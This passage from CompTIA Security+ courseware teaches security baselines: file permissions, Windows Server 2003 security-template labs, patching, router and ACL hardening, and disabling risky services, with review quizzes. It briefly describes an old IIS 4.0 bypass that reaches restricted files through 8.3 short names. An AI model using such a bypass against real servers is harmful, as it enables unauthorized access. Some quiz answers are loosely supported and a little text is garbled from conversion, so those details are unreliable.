              access. Similarly, when an accountant is transferred to a different division, his or her
              user account is removed from the accounting group, thereby revoking in a single action
              the multiple accounting privileges that are no longer needed.
              Using groups does not prevent you from granting additional rights to a single user.
              Those would simply be added directly to the user account. Be sure to identify rights that
              are made available to a set of users because those users might be better represented by a
              group of users. It’s also possible for a single user to gain privileges via membership in
              multiple groups in addition to those rights granted explicitly.
13–8          CompTIA Security+ Certification

                           Configuring access controls
 Emphasize that these      When creating user groups, a system administrator configures the operating system to
 are only guidelines,      recognize the user groups, and then assigns individual users to the appropriate groups.
 and adjustments might
 be needed to suit a       Then, the system administrator configures access controls for all protected files,
 particular environment.   directories, devices, and other objects.
 Remind students that
 the ultimate goal is to   The administrator should document all the configured permissions along with the
 provide users with the    rationales for them. Following are some of the common practices for setting file and
 least amount of access    data privileges:
 needed to accomplish
 their jobs.                   • Restrict access of operating system source files, configuration files, and their
                                 directories to authorized system administrators.
                               • For UNIX systems, there should be no world-writable files unless specifically
                                 required by necessary application programs. For Windows NT-based systems,
                                 there should be no permissions allowing the Everyone group to modify files.
                               • For UNIX systems, if possible, mount file systems as read only and nosuid to
                                 preclude unauthorized changes to files and programs.
                               • Assign an access permission of immutable to all kernel files if it’s supported by
                                 the operating system (such as Linux).
                               • Establish all log files as “append only” if that option is available.
                               • Prevent users from installing, removing, or editing scripts without administrative
                                 review. Otherwise, malicious users could exploit these files to gain unauthorized
                                 access to data and system resources.
                               • Pay attention to access control inheritance when defining categories of files and
                                 users. Ensure that you configure the operating system so that newly created files
                                 and directories inherit appropriate access controls, and that access controls
                                 propagate down the directory hierarchies as intended when you assign them.
                                 Administrators should disable a subdirectory’s ability to override top-level
                                 security directives unless that override is required. Malicious users can exploit a
                                 failure to use such practices and gain unauthorized access to other parts of the
                                 system.

                           Implementing access control with Windows Server 2003 security templates
                           One of the more difficult tasks for an administrator is determining the appropriate
                           security settings for a network. There are so many possibilities that it’s very easy to
                           miss an important setting, often resulting in a network full of security holes. Microsoft
                           has created security templates to assist administrators with this task. In addition,
                           Microsoft gives administrators the ability to create custom templates.

Do it!                     A-3:    Defining security templates in Windows Server 2003
                            Here’s how                                 Here’s why
                             1 Choose Start, Run…

                                Type mmc and press e

                             2 Choose File, Add/Remove                 To open the Add/Remove Snap-in window.
                                Snap-in…

                             3 Click Add…                              To open the Add Standalone Snap-in window.
                                                    Security baselines   13–9

 4 Under Snap-in, select
   Security Templates

   Click Add

 5 Click Close

 6 Click OK

 7 Expand Security Templates

 8 Expand C:\Windows\Security\Templates

 9 Right-click C:\Windows\Security\Templates

   Choose New Template…          From the shortcut menu.

10 Enter My Template             For the template name.

   Leave the description blank

   Click OK

11 Select and then expand My
   Template




12 Select and then right-click   To display the shortcut menu.
   Restricted Groups

   Choose Add group…             To open the Add Group dialog box.

13 Type Administrators           To specify the group object.



14 Click OK twice

15 Select and then right-click   To display the shortcut menu.
   Registry

   Choose Add Key…
13–10 CompTIA Security+ Certification

                     16 Under Registry, select
                        MACHINE




                     17 Click OK

                     18 Remove the CREATOR
                        OWNER and SYSTEM groups




                        Click OK

                     19 Click OK                         To Configure this key then Propagate inheritable
                                                         permissions to all subkeys.




                     20 Close the Console1 Window

                     21 Save the Console with the name
                        My Console

                     22 Click Yes                        To save the Security template.
                                                                             Security baselines   13–11

              Installing and configuring file encryption capabilities
Explanation   File encryption features, supported by certain operating systems, are useful if the
              operating system’s access controls are not adequate to maintain the confidentiality of
              file contents. Certain operating systems do not support access control lists; this might
              make it necessary to deploy file encryption features. Encryption is a very resource-
              consuming feature; therefore, the benefits of using it should be carefully weighed
              against the risks of not using it.

              Updates, patches, and service packs
              Due to the complexity of operating systems, security-related problems are often
              identified only after the OS has been released. Furthermore, it takes even more time for
              consumers to become aware of the problem, obtain the necessary patches, and install
              them on their systems. This gap gives potential intruders an opportunity to exploit the
              discovered security breach and launch related attacks on the system.
              To contain such risks, system administrators should keep track of security-related
              announcements that may apply to their systems. Depending on how critical the exposure
              is, the administrator may choose to disable the affected software until a solution (patch)
              can be applied to address the risk. Permanent fixes from vendors should be applied as
              they are made available. The following sections describe a systematic approach for
              addressing such issues.

              Establish procedures for monitoring security-related information
              Subscribing to mailing lists can enable administrators to receive important security-
              related announcements and to keep up with new developments and updates specific to
              their systems. There are also certain security-related sites, such as CERT or SANS, that
              educate users on industry best practices for security-related issues. Administrators may
              also seek out and monitor more discreet hacker sites, where exploits may appear prior to
              posting on a vendor site.

              Evaluate updates for applicability
              Certain software updates may not be applicable to a given system’s configuration or to
              an organization’s security requirements. System administrators should evaluate all the
              updates to determine their applicability to a given system’s configuration before
              actually applying them to their systems. An up-to-date paper log of each system can
              help you quickly determine the applicability of a patch. Tests should be conducted in a
              lab environment to assess the effect of an update on a system’s configuration.

              Plan the installation of applicable updates or patches
              The installation of an update or patch can itself cause security problems unless
              administered systematically based on a predefined plan. An inappropriately scheduled
              update might make information resources unavailable when needed by the system
              members. Furthermore, if an update must be performed on a large network, updates can
              lead to different and potentially incompatible versions of software on different parts of
              the network; this situation could cause information loss or corruption. The system might
              temporarily be placed in a more vulnerable state.
13–12 CompTIA Security+ Certification

                    Updates can also cause problems in other installed software within the system;
                    therefore, an update should be tested thoroughly in a test environment before being
                    applied to production systems. If an update must be done on a live system, then
                    schedule it during a period of light load, and ensure that sufficiently skilled personnel
                    are available to back up critical files, to update and test the system, and to return the
                    system to the original configuration if problems occur.
                    Methods of updating a system depend on the topology of a system. System
                    administrators can manually update small systems with a limited number of computers
                    and workstations. However, depending on how big the network is, administrators may
                    need to employ automated tools to apply software updates to a large number of
                    computers. Updates that are conducted in an unsystematic and haphazard way could
                    introduce new vulnerabilities to networks.

                    Install updates using a documented plan
                    In this step, system administrators follow a documented plan to apply the necessary
                    software updates, using some or all of the tactics described in the previous section. The
                    update plan as well as the necessary back-out procedures should be documented before
                    the system is updated.

                    Deploy new systems with the latest software
                    It’s important to make sure that new installations are compatible with planned upgrades.
                    The hard log should include a list of updates installed on existing systems, and the
                    administrator should keep an archive of required files, so that the new systems can be
                    deployed with the most updated software.
                    It’s also recommended that system administrators install the most up-to-date driver
                    software for all applications and system components. Those drivers typically address
                    performance and security issues and are made available to the public as problems are
                    discovered and resolved.
                                                                         Security baselines   13–13

Do it!   A-4:   Discussing file system security
          Questions and answers
          1 Which of the following is not required for securing file systems?
            A    Create the necessary user groups.
            B    Configure access controls.
            C    Configure file encryption.
            D    Avoid drive partitions.

          2 System administrators should disable ___________ permissions for all executable
            files and binary files.

            Write/Execute

          3 Which of the following are privileges that can be set on an object?
            A    Read
            B    Write
            C    Execute
            D    All of the above

          4 When you’re setting file system permissions, individual user accounts should be
            assigned access whenever possible. True or false?

            False. The principle of least privilege should be applied.

          5 Which of the following are common practices for setting file and data privileges?
            A    Restrict access of operating system source files, configuration files, and their
                 directories to authorized system administrators.
            B    Establish all log files as “append only” if that option is available.
            C    Prevent users from installing, removing, or editing scripts without
                 administrative review. Otherwise, malicious users could exploit these files to
                 gain unauthorized access to data and system resources.
            D    Pay attention to access control inheritance when defining categories of files
                 and users.
            E    All of the above.
13–14 CompTIA Security+ Certification


Topic B: Network hardening
                    This topic covers the following CompTIA Security+ exam objectives:

                     #     Objective

                     2.5   Recognize and understand the administration of the following file transfer protocols and
                           concepts
                            • Vulnerabilities
                                • 8.3 Naming Conventions

                     3.5   Understand the following concepts of Security Baselines, be able to explain what a Security
                           Baseline is, and understand the implementation and configuration of each kind of intrusion
                           detection system
                            • Network Hardening
                                • Updates (Firmware)
                                • Configuration
                                   • Enabling and Disabling Services and Protocols
                                   • Access Control Lists




                    Handling global network access
 Explanation        E-commerce and advances in information communications require today’s networks to
                    be globally accessible, thereby posing new challenges for security auditors. Businesses
                    must let customers and trading partners into the network; the trade-off, unfortunately, is
                    that such network designs are also very attractive for hackers and cyber-terrorists. Using
                    malicious tools available on the Internet, attackers can penetrate a network, take control
                    of routers and switches, obtain or destroy confidential information, and embed viruses,
                    Trojans, or backdoors into critical business applications. Networks are also susceptible
                    to outages that can have a negative impact on customer and trading partner
                    relationships. Business continuity is an essential ingredient in any e-commerce
                    environment. It’s therefore crucial to have a network with availability as well as with
                    adequate security.

                    Firmware updates
                    Generally speaking, firmware is programming that is inserted into erasable
                    programmable read-only memory (erasable programmable ROM), thus becoming a
                    permanent part of a computing device. Samples of firmware are the PC system BIOS
                    and router and switch boot code.
                    Firmware is created and tested like software (using micro code simulation). Firmware
                    updates can be made available by the vendors as vulnerabilities and malfunctions are
                    discovered within previous versions. When ready, such updates can be distributed like
                    other software and, using a special user interface, installed in the programmable read-
                    only memory by the user. Administrators should keep track of vendor announcements to
                    determine if they apply to their systems, and upgrade firmware on their network devices
                    as suggested by vendors.
                                                                Security baselines   13–15

Network configuration
Networks typically facilitate data transmission by a process called routing. Routing is
the process of deciding the disposition of each packet that a router receives, and then
either forwarding or discarding the data packet. Routers store destination addresses in a
data structure called the routing table. It can dynamically update its address base
through interactions with other routers. The routing mechanism decides whether to
forward or discard a packet by using the destination IP address in the packet header.
Routing functions and supporting structures are designed to route packets efficiently
and reliably, not securely. Therefore, a routing process should not be used to implement
security policy. Rather, firewall systems should govern security of information flow into
and out of the network. Most firewall systems’ routing configurations are static, and
hence less receptive to attacks.

Assigning network addresses for interfaces on a firewall device
Each network to which a firewall device is attached has a procedure to obtain new IP
addresses. For the Internet, IP addressing is typically obtained from the Internet service
provider (ISP) that connects to the firewall. For internal networks, including configured
demilitarized zone (DMZ) networks, administrators can obtain IP addresses from within
the organization. The IP addresses used internally typically come from the RFC 1918 IP
address specification, which is not routable across the Internet without necessary
translation.

Establishing the routing configuration
A firewall system’s routing table contains a list of IP addresses for which the firewall
system provides routing services. The routing decision is made based on the destination
network address of the data packet being processed by the firewall. If the destination
address exists in the routing table, the table provides the address of the next hop. If there
is no next hop associated with the destination, the packet is discarded. An Internet
Control Message Protocol (ICMP) “unreachable” message, indicating that the packet
was undeliverable, may be returned to the source.
When you’re replacing an existing firewall system, it’s important to understand the
network topology described by the routing configuration. The routing configuration of
the new firewall system must be consistent with the current system.
An organization’s network security policy should require that the routing configuration
of a firewall system be performed in an environment isolated from the production
network. This policy should also specify what connectivity is to be permitted with the
specific statements and deny all other connectivity.
The routing configuration is derived from the network topology and should not be used
to implement aspects of an organization’s security policy. Some firewall designs
implement a two-tier firewall architecture with a DMZ so that all inbound and outbound
packets travel through both firewall systems. In these designs, the outside firewall is
typically configured with more general packet-filtering rules. As packets move toward
the internal network, filtering rules become more specific and complex.
13–16 CompTIA Security+ Certification

                    Best practices for routers and firewalls
                    Following are common best practices that should be taken into account when you’re
                    configuring router and firewall systems:
                        • It’s very important to keep a copy of the current configurations of the network
                           devices at a safe location on your network. Attacks, power outages, and
                           configuration changes that may produce unexpected results might necessitate
                           configuration backups.
                        • Never allow IP-directed broadcasts through the system. Smurf attacks may
                           exploit this vulnerability.
                        • Configure devices with meaningful host names to make it easy to troubleshoot
                          problems within the network. IP addresses without names prolong
                          troubleshooting efforts, causing inefficient utilization of resources and time.
                          Because not all software can handle uppercase correctly, lowercase naming
                          conventions scale better.
                        • Always use a description for each interface. It’s a good practice to use the circuit
                          number as part of the description for wide area network (WAN) links.
                        • Always specify bandwidth on the interfaces even if it’s not needed. Certain
                          routing protocols use bandwidth information to calculate the routing metrics
                          when building their routing tables.
                        • Always configure a loopback address. Because the loopback interface is a
                          logical interface, depending on the topology of the network, you can still access
                          a device using a loopback interface regardless of the status of the primary
                          physical interface. The use of a logical interface could also provide redundant
                          paths to conduct Simple Network Management Protocol (SNMP) polling. A
                          stable interface is very important for protocols such as Systems Network
                          Architecture (SNA), which is very sensitive to time delays and outages.
                        • Despite its benefits in managing a network, SNMP can be very dangerous if not
                          handled with proper care. An SNMP agent together with a set of SNMP
                          application entities is known as an SNMP community. SNMP has two types of
                          communities: Read Only and Read/Write. If the associated password is
                          compromised, hackers can exploit the Read/Write community to execute
                          unauthorized configuration changes.
                        • Avoid using common words for password and naming schemes. Dictionary-
                          based password crackers can be used by malicious users to take advantage of
                          such practices.
                        • Using tools such as SYSLOG, deploy logging throughout your network to
                          collect information about interface status, events, and debugging and to place
                          that information on a central logging server. Even if a hacker were able to
                          modify the logs of a compromised system, he or she would then also need to
                          break into the SYSLOG server to get that copy.
                        • Restrict data traffic to required ports and protocols only.
                                                               Security baselines   13–17

Access control lists
An access control list (ACL) is a set of statements that controls the flow of packets
through a device based on certain parameters and information contained within a packet.
An ACL implements a certain type of security policy for an organization. For instance,
if an organization doesn’t want employees to use FTP across the Internet, the
organization can institute a restriction by placing an access list on the corresponding
interface. The access list would then enable the implementation of this policy. An access
control list should not be considered a policy by itself.
ACLs implement packet filtering. Packet filtering is the process of deciding the
disposition of each packet that can possibly pass through a router. IP filtering provides
the basic protection mechanism for a routing firewall device through inspection of
packet contents. This process governs what traffic passes through the device, thereby
potentially limiting access to each of the networks controlled by the firewall. The
determination of such filtering rules and their placement within the network can be
complex depending on the topology of the network. For a router that implements packet
filtering, the routing process might have multiple points where ACLs are applied.
Inbound data packets are typically inspected on arrival at the filtering device. Departing
packets, on the other hand, are usually subject to filtering rules immediately before a
packet is transmitted out of the device. Different rule sets might be used at each point
where filtering is applied. If certain components of the organization’s security policy
cannot be implemented via ACLs, administrators should evaluate additional security
tools, such as intrusion detection devices or proxies.
Packet-filtering rules, implemented by ACLs, can be designed based on intrinsic or
extrinsic information pertaining to a data packet. Intrinsic information is contained
within the packet itself, such as source address, destination address, protocol, source
port, destination port, packet length, and packet payload, which is the actual data.
Extrinsic information exists outside of a data packet. This information can include the
arrival/departure interface on the device, the context maintained by the firewall software
that pertains to a packet, and the date and time of packet arrival or departure.
In general, packet filters cannot reference extrinsic information. ACLs are generally
designed to implement separate sets of rules for different interfaces, sometimes with
separate sets for arriving and departing packets. By placing a given rule in the
appropriate interface’s rule set, you are using extrinsic information in the rules’ design.
Following are well-known best practices for designing filtering rules for new networks:
    • ACLs typically implement implicit denials at the end of a rule set. When applied
      on an interface, an implicit denial causes all packets to be denied unless there are
      explicit permissions. It’s a good practice to explicitly add the “deny all” rule to
      articulate the security policy of the organization more completely.
    • Design antispoofing rules, and place them at the top of the ACL.
    • Identify protocols, ports, and source and destination addresses that need to be
      serviced in your network. Make sure these requirements abide by your
      organization’s security policy.
    • Configure the filtering rule set of the ACL by protocol and by port.
    • Collapse the matching protocols rows and the consecutive ports rows together
      into one new row that specifies a range. This reduces the number of rules, hence
      increasing processing efficiency.
    • Place all permission rules between the antispoofing rules and the “deny all” rule
      at the end of the rule set.
13–18 CompTIA Security+ Certification

Do it!              B-1:    Discussing network hardening
                     Questions and answers
                      1 ____________ is a logical interface that is not tied to any physical interface.

                        Loopback

                      2 ____________ is a function of IP routing that allows the packet originator to
                        influence routing decisions as the packet traverses networks.

                        Source routing

                      3 Smurf attacks can be thwarted by disallowing ____________ ____________ on
                        routers.

                        IP-directed broadcasts

                      4 For best security on routers, never configure a loopback address. True or false?

                        False. Always configure a loopback address. The loopback interface allows you to access a
                        device regardless of the status of the primary physical interface.

                      5 The SNMP ____________ community string can be used to make changes in a
                        router configuration.

                        Read/Write

                      6 SNMP has two types of communities. Identify them from the list provided.
                        A    Router Access Only
                        B    Read Only
                        C    Random Access Only
                        D    Read/Write

                      7 ____________ is a useful feature to allow TCP data packets into your internal
                        network, given that the data traffic is initiated from your internal network.

                        Filtering
                                                                            Security baselines   13–19

              Disabling services and protocols
Explanation   Many services are vulnerable to Internet-based attacks, which have caused nightmares
              for system administrators over the years. To support novice administrators, many server
              operating systems are now packaged with a variety of software and installers, which
              start these services automatically. Every service should be evaluated for need and risks.
              Any services that are unnecessary should be removed. Those that are required should be
              evaluated and installed in a way that lowers potential risks. As a system administrator,
              you must become familiar with such services and take appropriate precautions to
              mitigate the risks associated with them.

              RPC
              Remote Procedure Call (RPC) is one of the most commonly exploited services on the
              Internet today. RPC essentially permits a computer to execute a program on another
              computer. RPC Portmapper, used to launch reconnaissance attacks, returns information
              about all RPC network services configured to run on your host systems. When a
              distributed application requires RPC service, it should be allowed only through secure
              access methods such as VPN. Otherwise, RPC services should be disabled by blocking
              access on corresponding ports on the Internet border routers. Network File System
              (NFS), the UNIX-based file-sharing mechanism, is also vulnerable to such attacks and
              therefore should be blocked from the Internet.

              Web services
              Like RPC, Web services are also commonly exploited by Internet-based attacks.
              However, unlike with RPC, most companies need to permit the HTTP protocol for
              access to hosted Web services. Most of the risk associated with servicing Web traffic
              results from either the deployment of outdated Web servers or the use of third-party
              applications with documented vulnerabilities. System administrators can prevent such
              vulnerabilities with proper research and configuration.

              SMTP, SNMP, and FTP
              Simple Mail Transfer Protocol (SMTP), Simple Network Management Protocol
              (SNMP), and FTP services provide avenues for most of the remaining Internet-based
              attacks.
                  • SMTP is the industry-standard protocol used for electronic mail. Most SMTP-
                    specific vulnerabilities result from unapplied or misapplied patches related to
                    Sendmail installations or misconfigured Sendmail daemons.
                  • SNMP protocol is used for remote management of devices across a network.
                    There is usually no reason to allow network management from the Internet. If
                    system administrators must have remote network management capability, it’s
                    suggested that SNMP be accomplished via VPN access.
                  • Anonymous FTP service allows anyone from the Internet to access internal FTP
                    servers, either to upload or download data. Such practices should be disallowed
                    unless there is a critical business need.
              Denial-of-service (DoS) attacks are commonly executed on systems that lack necessary
              configuration parameters. Such attacks have caused tremendous financial damage to
              many companies; the damage ranges from loss of business to even bankruptcy in certain
              cases. While it’s difficult to completely forestall any denial-of-service attack, carefully
              configuring your Internet devices can minimize the likelihood of being a target.
13–20 CompTIA Security+ Certification

                    The most common reason for successful DoS attacks is the presence of unnecessary
                    services running on network devices. For instance, Bootstrap Protocol, a service used to
                    distribute IP addresses to clients, is almost never needed and should be disabled on all
                    devices. Also, vulnerabilities associated with certain services can be fixed with patches
                    provided by vendors. Certain FTP servers suffer from a buffer overflow vulnerability
                    that can be easily fixed with patches. Administrators should disable all services that are
                    not needed for Internet-based operations. Furthermore, services, such as DNS, that are
                    necessary for Internet connectivity, should be properly reviewed, configured, and
                    monitored.

                    Internet Information Service (IIS)
                    Microsoft IIS 4.0 and earlier has a security hole related to web files that don’t use the
                    DOS 8.3 naming convention. Files stored using the long file name convention can be
                    accessed even if they’re restricted via IP address or through the use of SSL by simply
                    requesting the file in DOS 8.3 format. For example, if a file is named
                    MyConfidentialFile.htm, then a hacker can request MyConf~1.htm and be granted
                    access to the file. This security hole has been fixed in IIS versions above 4.0.

Do it!              B-2:     Managing services and protocols with Windows
                             Server 2003 security templates
                     Here’s how                                  Here’s why
                      1 Choose Start, Run…                       To apply a Windows Server 2003 security
                                                                 template and evaluate the results.

                                                                 Microsoft offers security templates at three
                                                                 primary levels: basic, secure, and high secure.
                                                                 The issues surrounding the use of these
                                                                 templates are unknown. Because the
                                                                 administrator is relying on Microsoft to secure
                                                                 the server, the settings are difficult to track.

                      2 Type mmc and press e

                      3 Choose File, My Console.msc              To open the previously created mmc con